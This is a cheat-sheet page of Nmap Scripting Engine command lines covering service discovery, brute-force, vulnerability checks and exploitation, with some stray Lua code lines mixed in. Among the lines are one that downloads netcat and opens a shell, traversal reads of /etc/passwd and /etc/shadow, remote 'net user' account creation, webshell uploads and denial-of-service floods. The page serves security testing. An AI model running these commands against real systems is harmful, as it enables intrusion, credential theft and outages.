NSE – Nmap Scripting Engine Best Scans

Some really useful NSE – Nmap Scripting Engine scripts.
Keyword search (ctrl+F) to find items related to what you need like smb, nse or even geolocation with IP Addresses and google maps.

— nmap –script acarsd-info –script-args “acarsd-info.timeout=10,acarsd-info.bytes=512” -p
— nmap -p 548 –script afp-brute
— nmap -sS -sV -p 548 –script=afp-ls target
— nmap -p 8009 –script ajp-auth [–script-args ajp-auth.path=/login]
— nmap -p 8009 –script ajp-brute
— nmap -p 8009 –script ajp-headers
— nmap -p 8009 –script ajp-methods
— nmap -p 8009 –script ajp-request
— nmap -Pn -sU -sV –script allseeingeye-info -p
— nmap –script amqp-info -p5672
— nmap –script asn-query [–script-args dns=]
— nmap -sU –script backorifice-brute –script-args backorifice-brute.ports= — nmap –script backorifice-info –script-args backorifice-info.password= — nmap –script bacnet-info -sU -p 47808
— nmap -p 8333 –script bitcoin-getaddr
— nmap -p 8333 –script bitcoin-info
— nmap -p 8332 –script bitcoinrpc-info –script-args creds.global=:
— nmap –script bittorrent-discovery –script-args newtargets,bittorrent-discovery.torrent=
— nmap -sU -p 8611,8612 –script bjnp-discover
— nmap –script broadcast-ataoe-discover -e
— nmap –script=broadcast-avahi-dos
— nmap –script broadcast-bjnp-discover
— nmap –script db2-discover
— nmap -6 –script broadcast-dhcp6-discover
— nmap –script broadcast-dhcp-discover
— nmap –script=broadcast-dns-service-discovery
— nmap –script=broadcast-dropbox-listener
— nmap –script=broadcast-dropbox-listener –script-args=newtargets -Pn
— nmap –script=broadcast-eigrp-discovery
— nmap –script=broadcast-eigrp-discovery -e wlan0
— nmap –script broadcast-igmp-discovery
— nmap –script broadcast-igmp-discovery -e wlan0
— nmap –script broadcast-igmp-discovery
— nmap –script broadcast-listener
— nmap –script broadcast-listener -e eth0
— nmap –script broadcast-ms-sql-discover
— nmap –script broadcast-ms-sql-discover,ms-sql-info –script-args=newtargets
— nmap –script=broadcast-netbios-master-browser
— nmap –script=broadcast-ospf2-discover
— nmap –script=broadcast-ospf2-discover -e wlan0
— nmap –script broadcast-pc-anywhere
— nmap –script broadcast-pc-duo
— nmap –script broadcast-pim-discovery
— nmap –script broadcast-pim-discovery -e eth1
— nmap –script broadcast-pppoe-discover
— nmap –script broadcast-rip-discover
— nmap –script broadcast-ripng-discover
— nmap -e eth0 –script broadcast-sonicwall-discover
— nmap –script broadcast-sybase-asa-discover
— nmap –script broadcast-tellstick-discover
— nmap –script broadcast-versant-locate
— nmap –script broadcast-wake-on-lan –script-args broadcast-wake-on-lan.MAC=’00:12:34:56:78:9A’
— nmap –script broadcast-wpad-discover
— nmap –script broadcast-wsdd-discover
— nmap –script broadcast-xdmcp-discover
— nmap -p 9160 –script=cassandra-brute
— nmap -p 9160 –script=cassandra-info
— nmap –script=cics-enum -p 23
— nmap –script=cics-enum –script-args=idlist=default_cics.txt,
— nmap –script=cics-info -p 23
— nmap –script=cics-info –script-args cics-info.commands=’logon applid(coolcics)’,
— nmap –script=cics-user-brute -p 23
— nmap –script=cics-user-brute –script-args userdb=users.txt,
— nmap –script=cics-user-enum -p 23
— nmap –script=cics-user-enum –script-args userdb=users.txt,
— nmap –script=citrix-brute-xml –script-args=userdb=,passdb=,ntdomain= -p 80,443,8080
— nmap –script=citrix-enum-apps-xml -p 80,443,8080
— nmap –script=citrix-enum-servers-xml -p 80,443,8080
— nmap -sV –script clamav-exec
— nmap –script clamav-exec –script-args cmd=’scan’,scandb=’files.txt’
— nmap –script clamav-exec –script-args cmd=’shutdown’
— nmap -p 5984 –script “couchdb-databases.nse”
— nmap -p 5984 –script “couchdb-stats.nse”
— nmap -p 631 –script cups-info
— nmap -p 631 –script cups-queue-info
— nmap -p 2401 –script cvs-brute
— nmap -p 2401 –script cvs-brute-repository
— nmap –script deluge-rpc-brute -p 58846
— nmap -sU -p 67 –script=dhcp-discover
— nmap -p 2628 –script dict-info
— nmap -p 3632 –script distcc-exec –script-args=”distcc-exec.cmd=’id'”
— nmap –script dns-blacklist –script-args=’dns-blacklist.ip=‘
— nmap -sn –script dns-blacklist
— nmap –script dns-brute –script-args dns-brute.domain=foo.com,dns-brute.threads=6,dns-brute.hostlist=./hostfile.txt,newtargets -sS -p 80
— nmap –script dns-brute www.foo.com
— nmap -sU -p 53 –script dns-cache-snoop.nse –script-args ‘dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}’
— nmap -sn -Pn ns1.example.com –script dns-check-zone –script-args=’dns-check-zone.domain=example.com’
— nmap -sU -p 53 –script dns-client-subnet-scan –script-args \
— nmap –script dns-client-subnet-scan –script-args \
— nmap -sU –script dns-fuzz –script-args timelimit=2h
— nmap –script dns-ip6-arpa-scan –script-args=’prefix=2001:0DB8::/48′
— nmap -sU -p 53 –script=dns-nsec3-enum –script-args dns-nsec3-enum.domains=example.com
— nmap -sSU -p 53 –script dns-nsec-enum –script-args dns-nsec-enum.domains=example.com
— nmap -sSU -p 53 –script dns-nsid
— nmap -sU -p 53 –script=dns-random-srcport
— nmap -sU -p 53 –script=dns-random-txid
— nmap -sU -p 53 –script=dns-recursion
— nmap –script=dns-service-discovery -p 5353
— nmap –script dns-srv-enum –script-args “dns-srv-enum.domain=’example.com'”
— nmap -sU -p 53 –script=dns-update –script-args=dns-update.hostname=foo.example.com,dns-update.ip=192.0.2.1
— nmap -sn -PN –script=dns-zeustracker
— nmap –script dns-zone-transfer.nse \
— nmap –script domcon-brute -p 2050
— nmap -p 2050 –script domcon-cmd –script-args domcon-cmd.cmd=”show server”, \
— nmap –script domino-enum-users -p 1352
— nmap –script dpap-brute -p 8770
— nmap -p 50000 –script drda-brute
— sudo nmap -PN -p445,443 –script duplicates,nbstat,ssl-cert
— nmap -e interface –script eap-info [–script-args=”eap-info.identity=0-user,eap-info.scan={13,50}”]
— nmap –script enip-info -sU -p 44818
— nmap -p 4369 –script epmd-info
— nmap -p 3031 –script eppc-enum-processes
— nmap -sn -Pn –script fcrdns
— nmap -sV –script fingerprint-strings
— nmap –script=firewalk –traceroute
— nmap –script=firewalk –traceroute –script-args=firewalk.max-retries=1
— nmap –script=firewalk –traceroute –script-args=firewalk.probe-timeout=400ms
— nmap –script=firewalk –traceroute –script-args=firewalk.max-probed-ports=7
— nmap –script firewall-bypass
— nmap –script firewall-bypass –script-args firewall-bypass.helper=”ftp”, firewall-bypass.targetport=22
— nmap –script flume-master-info -p 35871 host
— nmap –script fox-info.nse -p 1911
— nmap -sU -p 2302 –script=freelancer-info local arghost = stdnse.get_script_args(SCRIPT_NAME .. “.checkhost”) or “scanme.nmap.org”
— nmap –script ftp-brute -p 21
— nmap –script ftp-proftpd-backdoor -p 21
— nmap –script ftp-vsftpd-backdoor -p 21
— nmap –script ftp-vuln-cve2010-4221 -p 21
— nmap –script ganglia-info –script-args ganglia-info.timeout=60,ganglia-info.bytes=1000000 -p
— nmap -p 19150 –script gkrellm-info
— nmap -p 70 –script gopher-ls –script-args gopher-ls.maxfiles=100
— nmap -p 2947 –script gpsd-info
— nmap –script hadoop-datanode-info.nse -p 50075 host
— nmap –script hadoop-jobtracker-info [–script-args=hadoop-jobtracker-info.userinfo] -p 50030 host
— nmap –script hadoop-namenode-info -p 50070 host
— nmap –script hadoop-secondary-namenode-info -p 50090 host
— nmap –script hadoop-tasktracker-info -p 50060 host
— nmap –script hbase-master-info -p 60010 host
— nmap –script hbase-region-info -p 60030 host
— nmap –script hnap-info -p80,8080
— nmap –script hostmap-bfk –script-args hostmap-bfk.prefix=hostmap-
— nmap –script hostmap-crtsh –script-args ‘hostmap-crtsh.prefix=hostmap-‘
— nmap -sn –script hostmap-crtsh
— nmap –script hostmap-robtex -sn -Pn scanme.nmap.org
— nmap –script=http-affiliate-id.nse –script-args http-affiliate-id.url-path=/website
— nmap –script=http-apache-negotiation –script-args http-apache-negotiation.root=/root/
* https://github.com/michenriksen/nmap-scripts
— nmap -p 80 –script http-auth-finder
— nmap –script http-auth [–script-args http-auth.path=/login] -p80
— nmap -sV –script http-awstatstotals-exec.nse –script-args ‘http-awstatstotals-exec.cmd=”uname -a”, http-awstatstotals-exec.uri=/awstats/index.php’
— nmap -sV –script http-awstatstotals-exec.nse
— nmap -p80,8080 –script http-axis2-dir-traversal –script-args ‘http-axis2-dir-traversal.file=../../../../../../../etc/issue’
— nmap -p80 –script http-axis2-dir-traversal
— nmap –script=http-backup-finder
— nmap –script http-barracuda-dir-traversal –script-args http-max-cache-size=5000000 -p
— nmap -p –script http-bigip-cookie
— nmap –script http-brute -p 80
— nmap -p80,443 –script http-cakephp-version
— nmap –script http-chrono
— nmap -p 443 –script http-cisco-anyconnect
— nmap –script=http-config-backup
— nmap -p 443 –script http-cookie-flags
— nmap -p 80 –script http-cors
— nmap -p80 –script http-default-accounts host/ip
— nmap -sV –script http-dlink-backdoor
— nmap –script http-domino-enum-passwords -p 80 –script-args http-domino-enum-passwords.username=’patrik karlsson’,http-domino-enum-passwords.password=secret
— nmap –script=http-drupal-enum-users –script-args http-drupal-enum-users.root=”/path/”
— nmap –script http-exif-spider -p80,443
— nmap –script=http-favicon.nse \
— nmap –script http-fetch –script-args ‘paths={/robots.txt,/favicon.ico}’
— nmap –script http-fetch –script-args ‘paths=.html’
— nmap –script http-fetch –script-args ‘url=/images,paths={.jpg,.png,.gif}’
— nmap –script http-form-brute -p 80
— nmap –script http-form-fuzzer –script-args ‘http-form-fuzzer.targets={1={path=/},2={path=/register.html}}’ -p 80
— nmap -p 80 –script=http-frontpage-login
— nmap –script http-generator [–script-args http-generator.path=,http-generator.redirects=,…]
— nmap -p80 www.example.com –script http-gitweb-projects-enum
— nmap -p80 –script http-google-malware
— nmap -p 80 www.example.com –script http-grep –script-args=’match=”[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?”,breakonmatch’
— nmap -p 80 www.example.com –script http-grep –script-args ‘http-grep.builtins ={“mastercard”, “discover”}, http-grep.url=”example.html”‘
— nmap -sn -Pn –script http-icloud-findmyiphone –script-args=’username=,password=‘
— nmap -sn -Pn –script http-icloud-sendmsg –script-args=”username=,password=,http-icloud-sendmsg.listdevices”
— nmap -sn -Pn –script http-icloud-sendmsg –script-args=”username=,password=,deviceindex=1,subject=’subject’,message=’hello world.’,sound=false”
— nmap -p80 –script http-iis-short-name-brute
— nmap –script http-iis-webdav-vuln -p80,8080
return nmap.verbosity() > 0 and “WebDAV is ENABLED. No protected folder found; check not run. If you know a protected folder, add –script-args=webdavfolder=” or nil
— nmap -sV –script http-joomla-brute
— nmap -sV –script http-joomla-brute
— nmap -p 80 –script http-jsonp-detection
— nmap -p80 –script http-litespeed-sourcecode-download –script-args http-litespeed-sourcecode-download.uri=/phpinfo.php
— nmap -p8088 –script http-litespeed-sourcecode-download
— nmap -n -p 80 –script http-ls test-debit.free.fr
— nmap -p80 –script http-majordomo2-dir-traversal
— nmap –script http-methods
— nmap –script http-methods –script-args http-methods.url-path=’/website’
— nmap -p 80 –script http-ntlm-info –script-args http-ntlm-info.root=/root/
— nmap –script http-open-proxy.nse \
— nmap –script=http-open-redirect
— nmap –script http-passwd –script-args http-passwd.root=/test/
— nmap -p80 –script http-phpmyadmin-dir-traversal –script-args=”dir=’/pma/’,file=’../../../../../../../../etc/passwd’,outfile=’passwd.txt'”
— nmap -p80 –script http-phpmyadmin-dir-traversal
— nmap –script=http-phpself-xss -p80
— nmap -sV –script http-self-xss
— nmap –script http-proxy-brute -p 8080
local arg_url = stdnse.get_script_args(SCRIPT_NAME .. ‘.url’) or ‘http://scanme.nmap.org/’
— nmap -p 80 –script http-put –script-args http-put.url=’/uploads/rootme.php’,http-put.file=’/tmp/rootme.php’
— nmap –script http-qnap-nas-info -p
— nmap –script http-rfi-spider -p80
— nmap –script http-robtex-reverse-ip –script-args http-robtex-reverse-ip.host=’‘
— nmap –script http-robtex-shared-ns
— nmap -p –script http-security-headers
— nmap -sV -p- –script http-shellshock
— nmap -sV -p- –script http-shellshock –script-args uri=/cgi-bin/bin,cmd=ls
— nmap –script http-sitemap-generator -p 80
— nmap –script http-slowloris-check
— nmap –script http-slowloris –max-parallelism 400
slowloris:set_timeout(math.min(200 * 1000, end_time – nmap.clock_ms())) — Set a long timeout so our socket doesn’t timeout while it’s waiting. At the same time left for script execution is maximum limit.
— nmap –script http-trace -d
— nmap –script=http-traceroute
— nmap –script=http-unsafe-output-escaping
— nmap –script http-vhosts -p 80,8080,443
— nmap –script http-virustotal –script-args=’http-virustotal.apikey=”“,http-virustotal.checksum=”275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f”‘
— nmap -p 54340 –script http-vlcstreamer-ls
— nmap –script http-vmware-path-vuln -p80,443,8222,8333
— nmap -sV –script http-vuln-cve2006-3392
— nmap -p80 –script http-vuln-cve2006-3392 –script-args http-vuln-cve2006-3392.file=/etc/shadow
— nmap –script=http-vuln-cve2009-3960 –script-args http-http-vuln-cve2009-3960.root=”/root/”
— nmap –script=http-vuln-cve2010-0738 –script-args ‘http-vuln-cve2010-0738.paths={/path1/,/path2/}’
— nmap –script http-vuln-cve2010-2861
— nmap –script http-vuln-cve2011-3192.nse [–script-args http-vuln-cve2011-3192.hostname=nmap.scanme.org] -pT:80,443
— nmap –script http-vuln-cve2011-3368
— nmap -sV –script http-vuln-cve2012-1823
— nmap -p80 –script http-vuln-cve2012-1823 –script-args http-vuln-cve2012-1823.uri=/test.php
— nmap -sV –script http-vuln-cve2013-0156
— nmap -sV –script http-vuln-cve2013-0156 –script-args uri=”/test/”
— nmap -sV –script http-vuln-cve2013-7091
— nmap -p80 –script http-vuln-cve2013-7091 –script-args http-vuln-cve2013-7091=/ZimBra
— nmap -p 443 –script http-vuln-cve2014-2126
— nmap -p 443 –script http-vuln-cve2014-2127
— nmap -p 443 –script http-vuln-cve2014-2128
— nmap -p 443 –script http-vuln-cve2014-2129
— nmap –script http-vuln-cve2014-3704 –script-args http-vuln-cve2014-3704.cmd=”uname -a”,http-vuln-cve2014-3704.uri=”/drupal”
— nmap –script http-vuln-cve2014-3704 –script-args http-vuln-cve2014-3704.uri=”/drupal”,http-vuln-cve2014-3704.cleanup=false
— nmap –script http-vuln-cve2014-8877 –script-args http-vuln-cve2014-8877.cmd=”whoami”,http-vuln-cve2014-8877.uri=”/wordpress”
— nmap –script http-vuln-cve2014-8877
— nmap –script=http-vuln-cve2015-1427 –script-args command= ‘ls’
— nmap –script http-vuln-cve2017-1001000 –script-args http-vuln-cve2017-1001000=”uri”
— nmap –script http-vuln-cve2017-1001000
— nmap -p –script http-vuln-cve2017-5638
— nmap -p 16992 –script http-vuln-cve2017-5689
— nmap -p 7547 –script=http-vuln-misfortune-cookie
— nmap -sV –script http-vuln-wnr1000-creds -p80
— nmap -p80 –script http-waf-detect
— nmap -p80 –script http-waf-detect –script-args=”http-waf-detect.aggro,http-waf-detect.uri=/testphp.vulnweb.com/artists.php” www.modsecurity.org
— nmap –script=http-waf-fingerprint
— nmap –script=http-waf-fingerprint –script-args http-waf-fingerprint.intensive=1
— nmap –script http-webdav-scan -p80,8080
— nmap -sV –script http-wordpress-brute
— nmap -sV –script http-wordpress-brute
— nmap -p80 –script http-wordpress-users
— nmap -sV –script http-wordpress-users –script-args limit=50
— nmap -sU -p 4569 –script iax2-brute
— nmap -p 1344 –script icap-info
— nmap -sU -p 500 –script ike-version
— nmap -p 143,993 –script imap-brute
— nmap -p 143,993 –script imap-ntlm-info
— nmap –script informix-brute -p 9088
— nmap -p 9088 –script informix-query –script-args informix-query.username=informix,informix-query.password=informix
— nmap -p 9088 –script informix-tables –script-args informix-tables.username=informix,informix-tables.password=informix
— sudo nmap -sn –script ip-forwarding –script-args=’target=www.example.com’
— nmap –script ip-geolocation-geoplugin
— nmap –script ip-geolocation-ipinfodb –script-args ip-geolocation-ipinfodb.apikey=
— nmap -sn -Pn –script ip-geolocation-geoplugin,ip-geolocation-map-bing –script-args ip-geolocation-map-bing.api_key=[redacted],ip-geolocation-map-bing.map_path=map.png
— nmap -sn -Pn –script ip-geolocation-geoplugin,ip-geolocation-map-google –script-args ip-geolocation-map-google.api_key=[redacted],ip geolocation-map-google.map_path=map.png
— nmap -sn -Pn –script ip-geolocation-geoplugin,ip-geolocation-map-kml –script-args ip-geolocation-map-kml.map_path=map.kml
— nmap –script ip-geolocation-maxmind [–script-args ip-geolocation.maxmind_db=]
— nmap –script ip-https-discover
— nmap –script ipidseq [–script-args probeport=port] target
— nmap -sU –script ipmi-brute -p 623
— nmap -sU –script ipmi-cipher-zero -p 623
— nmap -sU –script ipmi-version -p 623
— nmap –script=ipv6-multicast-mld-list local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. “.interface”) or nmap.get_interface()
— nmap -6 –script ipv6-ra-flood.nse
— nmap -6 –script ipv6-ra-flood.nse –script-args ‘interface=‘
— nmap -6 –script ipv6-ra-flood.nse –script-args ‘interface=,timeout=10s’
if not stdnse.get_script_args(SCRIPT_NAME .. “.interface”) and not nmap.get_interface() then
local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. “.interface”) or nmap.get_interface()
— nmap -p 6667 –script=irc-botnet-channels
— nmap -p 6667 –script=irc-botnet-channels –script-args ‘irc-botnet-channels.channels={chan1,chan2,chan3}’
— nmap –script irc-brute -p 6667
— nmap –script irc-sasl-brute -p 6667
$ nmap -d -p6667 –script=irc-unrealircd-backdoor.nse –script-args=irc-unrealircd-backdoor.command=’wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh’
— nmap -p 3205 –script isns-info
— nmap –script knx-gateway-discover -e eth0
— nmap -p 88 –script krb5-enum-users –script-args krb5-enum-users.realm=’test’
— nmap -p 389 –script ldap-brute –script-args ldap.base='”cn=users,dc=cqure,dc=net”‘
— nmap -p 636 –script ldap-novell-getpass –script-args \
— nmap -p 389 –script ldap-rootdse
— nmap -p 389 –script ldap-search –script-args ‘ldap.username=”cn=ldaptest,cn=users,dc=cqure,dc=net”,ldap.password=ldaptest,
— nmap -p 389 –script ldap-search –script-args ‘ldap.username=”cn=ldaptest,cn=users,dc=cqure,dc=net”,ldap.password=ldaptest,
— nmap -sU -p 9100 –script=lexmark-config
— nmap –script llmnr-resolve –script-args ‘llmnr-resolve.hostname=examplename’ -e wlan0
— nmap -e –script lltd-discovery
— nmap –script lu-enum -p 23
— nmap –script lu-enum –script-args lulist=lus.txt,
— nmap -p 7210 –script maxdb-info
— nmap -p 11211 –script membase-brute
— nmap -p 8091 –script membase-http-info
— nmap -p 11211 –script memcached-info
— nmap –script=metasploit-info –script-args username=root,password=root
— nmap –script metasploit-msgrpc-brute -p 55553
— nmap –script metasploit-xmlrpc-brute -p 55553
— nmap -p8728 –script mikrotik-routeros-brute
— nmap –script mmouse-brute -p 51010
— nmap -p 51010 –script mmouse-exec \
— nmap –script modbus-discover.nse –script-args=’modbus-discover.aggressive=true’ -p 502
— nmap -p 27017 –script mongodb-brute
— nmap -p 27017 –script mongodb-databases
— nmap -p 27017 –script mongodb-info
— nmap –script mrinfo
— nmap –script mrinfo -e eth1
— nmap –script mrinfo –script-args ‘mrinfo.target=172.16.0.4’
— nmap -p 445 –script ms-sql-brute –script-args mssql.instance-all,userdb=customuser.txt,passdb=custompass.txt
— nmap -p 1433 –script ms-sql-brute –script-args userdb=customuser.txt,passdb=custompass.txt
— nmap -p 1433 –script ms-sql-config –script-args mssql.username=sa,mssql.password=sa
— sudo nmap -sU -p 1434 –script ms-sql-dac
— nmap -p 1433 –script ms-sql-dump-hashes
— nmap -p 445 –script ms-sql-empty-password –script-args mssql.instance-all
— nmap -p 1433 –script ms-sql-empty-password
— nmap -p 1433 –script ms-sql-hasdbaccess –script-args mssql.username=sa,mssql.password=sa
nmap -sn --script ms-sql-empty-password --script-args mssql.instance-all
— nmap -p 445 –script ms-sql-info
— nmap -p 1433 –script ms-sql-info –script-args mssql.instance-port=1433
— nmap -p 1433 –script ms-sql-ntlm-info
— nmap -p 1433 –script ms-sql-query –script-args mssql.username=sa,mssql.password=sa,ms-sql-query.query=”SELECT * FROM master..syslogins”
— nmap -p 1433 –script ms-sql-tables –script-args mssql.username=sa,mssql.password=sa
— nmap -p 445 –script ms-sql-discover,ms-sql-empty-password,ms-sql-xp-cmdshell
— nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=”net user test test /add”
— nmap –script mtrace –script-args ‘mtrace.fromip=172.16.45.4′
— nmap -p 3306 –script mysql-audit –script-args “mysql-audit.username=’root’, \
— nmap –script=mysql-brute
— nmap -p 3306 –script mysql-dump-hashes –script-args=’username=root,password=secret’
— nmap –script=mysql-enum
— nmap -p 3306 –script mysql-query –script-args=’query=”“[,username=,password=]’
local mysql_pwd = stdnse.get_script_args(SCRIPT_NAME..”.pass”) or “nmapFTW”
— nmap -sU -p 5351 –script=nat-pmp-info
— nmap -sU -p 5351 –script nat-pmp-mapport –script-args=’op=map,pubport=8080,privport=8080,protocol=tcp’
— nmap -sU -p 5351 –script nat-pmp-mapport –script-args=’op=unmap,pubport=8080,privport=8080,protocol=tcp’
— nmap -sU -p 5351 –script nat-pmp-mapport –script-args=’op=unmapall,protocol=tcp’
— nmap -sU -p 137 –script nbns-interfaces
— sudo nmap -sU –script nbstat.nse -p137
— nmap -p 10000 –script ndmp-fs-info
— nmap –script nessus-brute -p 1241
— nmap -p 12345 –script netbus-auth-bypass
— nmap -p 12345 –script netbus-brute
— nmap -p 12345 –script netbus-info –script-args netbus-info.password= — nmap -sV -p 12345 –script netbus-version
— nmap –script nexpose-brute -p 3780
— nmap -p 111 –script=nfs-ls
— nmap -sV –script=nfs-ls
— nmap -p 111 –script=nfs-statfs
— nmap -sV –script=nfs-statfs
— nmap -sV –script=nje-node-brute
— nmap –script=nje-node-brute –script-args=hostlist=nje_names.txt -p 175
— nmap -sV –script=nje-pass-brute –script-args=ohost=’POTATO’,rhost=’CACTUS’
— nmap –script=nje-pass-brute –script-args=ohost=’POTATO’,rhost=’CACTUS’,sleep=5 -p 175
— nmap -p 119,433,563 –script nntp-ntlm-info
— nmap -p 9929 –script nping-brute
— nmap –script nrpe-enum -p 5666
— nmap -sU -p 123 –script ntp-info
— nmap -sU -pU:123 -Pn -n –script=ntp-monlist
— nmap -p 9390 –script omp2-brute
— nmap -p 9390 –script omp2-brute,omp2-enum-targets
— nmap -p 9390 –script omp2-enum-targets –script-args omp2.username=admin,omp2.password=secret
— nmap –script omron-info -sU -p 9600
— nmap -p 5850 –script openlookup-info
— nmap –script openwebnet-discovery
— nmap –script oracle-brute -p 1521 –script-args oracle-brute.sid=ORCL
— nmap –script oracle-brute-stealth -p 1521 –script-args oracle-brute-stealth.sid=ORCL
— nmap –script oracle-enum-users –script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560
— nmap –script=oracle-sid-brute –script-args=oraclesids=/path/to/sidfile -p 1521-1560
— nmap –script=oracle-sid-brute -p 1521-1560
— nmap –script p2p-conficker,smb-os-discovery,smb-check-vulns –script-args=safe=1 -T4 -vv -p445
— sudo nmap -sU -sS –script p2p-conficker,smb-os-discovery,smb-check-vulns –script-args=safe=1 -vv -T4 -p U:137,T:139
— nmap -p139,445 -vv –script p2p-conficker,smb-os-discovery,smb-check-vulns –script-args=checkconficker=1,safe=1 -T4
— nmap –script p2p-conficker,smb-os-discovery,smb-check-vulns -p- –script-args=checkall=1,safe=1 -vv -T4
— nmap –script p2p-conficker,smb-os-discovery -p445 –script-args=realip=\”192.168.1.65\” -vv -T4
— nmap –script path-mtu target
— nmap –script=pcanywhere-brute
— nmap –script pcworx-info -p 1962
— nmap -p 5432 –script pgsql-brute
— nmap –script=pjl-ready-message.nse \
— nmap -p 110,995 –script pop3-ntlm-info
— nmap –script qconn-exec –script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd=”uname -a” -p
— nmap –script qscan –script-args qscan.confidence=0.95,qscan.delay=200ms,qscan.numtrips=10 target
— nmap -n -sU -Pn –script quake1-info -pU:26000-26004 —
— nmap -sU -sV -Pn –script quake3-info.nse -p
— nmap -sU -p 27950 –script=quake3-master-getservers
— nmap -p 3389 –script rdp-enum-encryption
— nmap -p 3389 –script rdp-ntlm-info
— nmap -sV –script=rdp-vuln-ms12-020 -p 3389
— nmap -p 6379 –script redis-brute
— nmap -p 6379 –script redis-info
— nmap –script=resolveall –script-args=newtargets,resolveall.hosts={, …} …
— nmap –script=resolveall manyaddresses.example.com
— nmap –script reverse-index
— nmap -p 512 –script rexec-brute
— nmap -p 8098 –script riak-http-info
— nmap -p 513 –script rlogin-brute
— nmap –script=rmi-vuln-classloader -p 1099
— nmap -p 2002 –script rpcap-brute
— nmap -p 2002 –script rpcap-info
— nmap -p 2002 –script rpcap-info –script-args=”creds.rpcap=’administrator:foobar'”
— nmap –script rpc-grind
— nmap –script rpc-grind –script-args ‘rpc-grind.threads=8’ -p
— nmap -p 22,443 –script rsa-vuln-roca
— nmap -p 873 –script rsync-brute –script-args ‘rsync-brute.module=www’
— nmap -p 873 –script rsync-list-modules
— nmap -p 554 –script rtsp-methods
— nmap –script rtsp-url-brute -p 554
— nmap –script s7-info.nse -p 102
— nmap –script=samba-vuln-cve-2012-1182 -p 139
— nmap -sU -p 6481 –script=servicetags a -sV nmap scan. The ShodanAPI key can be set with the ‘apikey’ script
— nmap –script shodan-api x.y.z.0/24 -sn -Pn -n –script-args ‘shodan-api.outfile=potato.csv,shodan-api.apikey=SHODANAPIKEY’
— nmap –script shodan-api –script-args ‘shodan-api.target=x.y.z.a,shodan-api.apikey=SHODANAPIKEY’
— nmap -sU -p 5060 –script=sip-brute
— nmap –script=sip-call-spoof -sU -p 5060
— nmap –script=sip-call-spoof -sU -p 5060 –script-args
— nmap –script=sip-enum-users -sU -p 5060
— nmap –script=sip-enum-users -sU -p 5060 –script-args
— nmap –script=sip-methods -sU -p 5060
— nmap –script smb-brute.nse -p445
— sudo nmap -sU -sS –script smb-brute.nse -p U:137,T:139
— nmap –script smb-enum-domains.nse -p445
— sudo nmap -sU -sS –script smb-enum-domains.nse -p U:137,T:139
— nmap –script smb-enum-users.nse -p445
— sudo nmap -sU -sS –script smb-enum-users.nse -p U:137,T:139
— nmap –script smb-enum-processes.nse -p445
— sudo nmap -sU -sS –script smb-enum-processes.nse -p U:137,T:139
— nmap –script smb-enum-services.nse -p445
— nmap –script smb-enum-services.nse –script-args smbusername=,smbpass= -p445
— nmap –script smb-enum-sessions.nse -p445
— sudo nmap -sU -sS –script smb-enum-sessions.nse -p U:137,T:139
— nmap –script smb-enum-shares.nse -p445
— sudo nmap -sU -sS –script smb-enum-shares.nse -p U:137,T:139
— nmap –script smb-enum-users.nse -p445
— sudo nmap -sU -sS –script smb-enum-users.nse -p U:137,T:139
— nmap –script smb-flood.nse -p445
— sudo nmap -sU -sS –script smb-flood.nse -p U:137,T:139
— nmap -p 445 –script smb-ls –script-args ‘share=c$,path=\temp’
— nmap -p 445 –script smb-enum-shares,smb-ls
— nmap -p 445 –script smb-mbenum
standard nmap version detection information with data that this script has discovered.
— nmap –script smb-os-discovery.nse -p445 127.0.0.1
— sudo nmap -sU -sS –script smb-os-discovery.nse -p U:137,T:139 127.0.0.1
$ ./nmap -n -d -p445 –script=smb-psexec –script-args=smbuser=test,smbpass=test,config=examples,host=1.2.3.4 192.168.1.21
— nmap –script smb-psexec.nse –script-args=smbuser=,smbpass=[,config=] -p445
— sudo nmap -sU -sS –script smb-psexec.nse –script-args=smbuser=,smbpass=[,config=] -p U:137,T:139
— nmap –script smb-security-mode.nse -p445 127.0.0.1
— sudo nmap -sU -sS –script smb-security-mode.nse -p U:137,T:139 127.0.0.1
— nmap –script smb-server-stats.nse -p445
— sudo nmap -sU -sS –script smb-server-stats.nse -p U:137,T:139
— nmap –script smb-system-info.nse -p445
— sudo nmap -sU -sS –script smb-system-info.nse -p U:137,T:139
— nmap –script smb-vuln-conficker.nse -p445
— nmap -sU –script smb-vuln-conficker.nse -p T:139
— nmap –script smb-vuln-cve2009-3103.nse -p445
— nmap -sU –script smb-vuln-cve2009-3103.nse -p U:137,T:139
— nmap –script smb-vuln-ms06-025.nse -p445
— nmap -sU –script smb-vuln-ms06-025.nse -p U:137,T:139
— nmap –script smb-vuln-ms07-029.nse -p445
— nmap -sU –script smb-vuln-ms07-029.nse -p U:137,T:139
— nmap –script smb-vuln-ms08-067.nse -p445
— nmap -sU –script smb-vuln-ms08-067.nse -p U:137
* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010
— nmap –script smb-vuln-regsvc-dos.nse -p445
— nmap -sU –script smb-vuln-regsvc-dos.nse -p U:137,T:139
— nmap –script smb-vuln-webexec –script-args smbusername=,smbpass= -p445
— nmap –script smb-vuln-webexec –script-args ‘smbusername=,smbpass=,webexec_command=net user test test /add’ -p139,445
— nmap –script smb-vuln-webexec –script-args ‘smbusername=,smbpass=,webexec_gui_command=cmd’ -p139,445
— nmap -p 25 –script smtp-brute
— nmap –script smtp-commands.nse [–script-args smtp-commands.domain=] -pT:25,465,587
— nmap –script smtp-enum-users.nse [–script-args smtp-enum-users.methods={EXPN,…},…] -p 25,465,587
— nmap -p 25,465,587 –script smtp-ntlm-info –script-args smtp-ntlm-info.domain=domain.com
server allows if nmap is in verbose mode otherwise the script will print the number of
— nmap –script smtp-open-relay.nse [–script-args smtp-open-relay.domain=,smtp-open-relay.ip=